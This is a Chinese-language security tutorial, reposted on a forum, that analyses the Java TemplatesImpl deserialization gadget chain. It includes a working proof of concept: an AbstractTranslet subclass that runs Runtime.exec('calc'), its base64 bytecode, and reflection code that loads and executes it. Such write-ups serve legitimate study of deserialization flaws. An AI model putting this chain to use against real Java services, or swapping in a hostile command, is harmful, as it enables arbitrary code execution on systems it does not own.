ToB企服应用市场:ToB评测及商务社交产业平台

标题: Java反序列化漏洞-TemplatesImpl使用链分析 [打印本页]

---

作者: 慢吞云雾缓吐愁    时间: 2024-9-7 23:43
标题: Java反序列化漏洞-TemplatesImpl使用链分析
目录

• 一、前言
  
• 二、正文
  
  
  
  • 1. 寻找使用链
    
  • 2. 构造POC
    
    
    
    • 2.1 生成字节码
      
    • 2.2 加载字节码
      
      
      
      • 1）getTransletInstance
        
      • 2）defineTransletClasses
        
      
      
    • 2.3 创建实例
      
    
    
  • 3. 完整POC
    
  
  
• 三、参考文章
  

一、前言

java.lang.ClassLoader#defineClass

defineClass可以加载字节码，但由于defineClass的作用域是protected，所以攻击者很少能直接使用到它，但它却是我们常用的一个攻击链 TemplatesImpl 的基石。
二、正文

1. 寻找使用链

由于defineClass的访问修饰符为protected，所以我们需要寻找使用defineClass的方法，直到找到修饰符为public的方法即可。
查找defineClass的声明和用例，可以看到com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl的TransletClassLoader方法重载了defineClass方法：

TransletClassLoader，由于它的作用域是default，所以还得继承寻找调用TransletClassLoader的方法。

终极找到的调用链：

1. TemplatesImpl#newTransformer() -->                        public
2. TemplatesImpl#getTransletInstance() -->                private
3. TemplatesImpl#defineTransletClasses() -->        private
4. TransletClassLoader#defineClass()                        default

复制代码

2. 构造POC

2.1 生成字节码

请注意，由于defineTransletClasses方法的限定，所以编写的被加载的类必须继承自com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet

1. import com.sun.org.apache.xalan.internal.xsltc.DOM;
2. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
7. public class Evil extends AbstractTranslet {
8.     @Override
9.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
10.     @Override
11.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
13.     public Evil() throws Exception {
14.         Runtime.getRuntime().exec("calc");
15.     }
16. }

复制代码

使用javac编译后，base64编码，生成终极的字节码

1. yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBABtMZWFyblRlbXBsYXRlSW1wbEJ5dGVzLmphdmEMAA4ADwcAHAwAHQAeAQAEY2FsYwwAHwAgAQAWTGVhcm5UZW1wbGF0ZUltcGxCeXRlcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAADQALAAAABAABAAwAAQAHAA0AAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAABEACwAAAAQAAQAMAAEADgAPAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAAEwAEABQADQAVAAsAAAAEAAEAEAABABEAAAACABI=

复制代码

2.2 加载字节码

首先编写一个静态类，用于反射修改成员变量

1. static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
2.     Field declaredField = obj.getClass().getDeclaredField(fieldName);
3.     declaredField.setAccessible(true);
4.     declaredField.set(obj, value);
5. }

复制代码

1）getTransletInstance

检察TemplatesImpl类的getTransletInstance方法，可以看到需要颠末两个if判定才华调用defineTransletClasses，_name需要赋一个String类型的值，_class本来就是null无需修改，我们来反射修改_name的值。

1.     public static void main(String[] args) throws Exception {
2.         TemplatesImpl templates = new TemplatesImpl();
3.         setFieldValue(templates, "_name", "随便");
4.         templates.newTransformer();
5.     }

复制代码

2）defineTransletClasses

接着进入defineTransletClasses，如果_bytecode为空会报此 Templates 不包罗有用的 translet 类界说的错误，如果_tfactory为为null步伐会直接返回。

可以看_bytecode作为参数调用了defineClass，所以_bytecode的值应为被加载的字节码。
然后可以看到被加载的类的必须继承自ASTRACT_TRANSLET，即com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet，这就是刚才被加载类需要继承AbstractTranslet的原因。

继承修改POC：

1. public static void main(String[] args) throws Exception {
2.     byte[] bytecode = Base64.getDecoder().decode("#####你的字节码#####");
3.     TemplatesImpl templates = new TemplatesImpl();
4.     setFieldValue(templates, "_name", "随便");
5.     setFieldValue(templates, "_bytecodes", new byte[][]{bytecode});
6.     setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
7.     templates.newTransformer();
8. }

复制代码

2.3 创建实例

在defineTransletClasses中，加载_bytecode得到的Class对象赋给了_class

在getTransletInstance中_class类被创建实例，调用构造方法，至此乐成命令实行。这就是为什么没有自己调用newInstance而仍能命令实行的原因。

3. 完整POC

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
6. import java.lang.reflect.Field;
7. import java.util.Base64;
9. public class LearnTemplatesImpl {
10.     public static void main(String[] args) throws Exception {
11.         byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBABtMZWFyblRlbXBsYXRlSW1wbEJ5dGVzLmphdmEMAA4ADwcAHAwAHQAeAQAEY2FsYwwAHwAgAQAWTGVhcm5UZW1wbGF0ZUltcGxCeXRlcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAADQALAAAABAABAAwAAQAHAA0AAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAABEACwAAAAQAAQAMAAEADgAPAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAAEwAEABQADQAVAAsAAAAEAAEAEAABABEAAAACABI=");
12.         TemplatesImpl templates = new TemplatesImpl();
13.         setFieldValue(templates, "_name", "随便");
14.         setFieldValue(templates, "_bytecodes", new byte[][]{bytecode});
15.         setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
16.         templates.newTransformer();
17.     }
19.     static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
20.         Field declaredField = obj.getClass().getDeclaredField(fieldName);
21.         declaredField.setAccessible(true);
22.         declaredField.set(obj, value);
23.     }
24. }

复制代码

三、参考文章

java安全漫谈 - phith0n
动态加载字节码学习 - bfengj
TemplatesImpl使用链分析 - seizer-zyx
Java反序列化之字节码二三事 - Drunkbaby

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4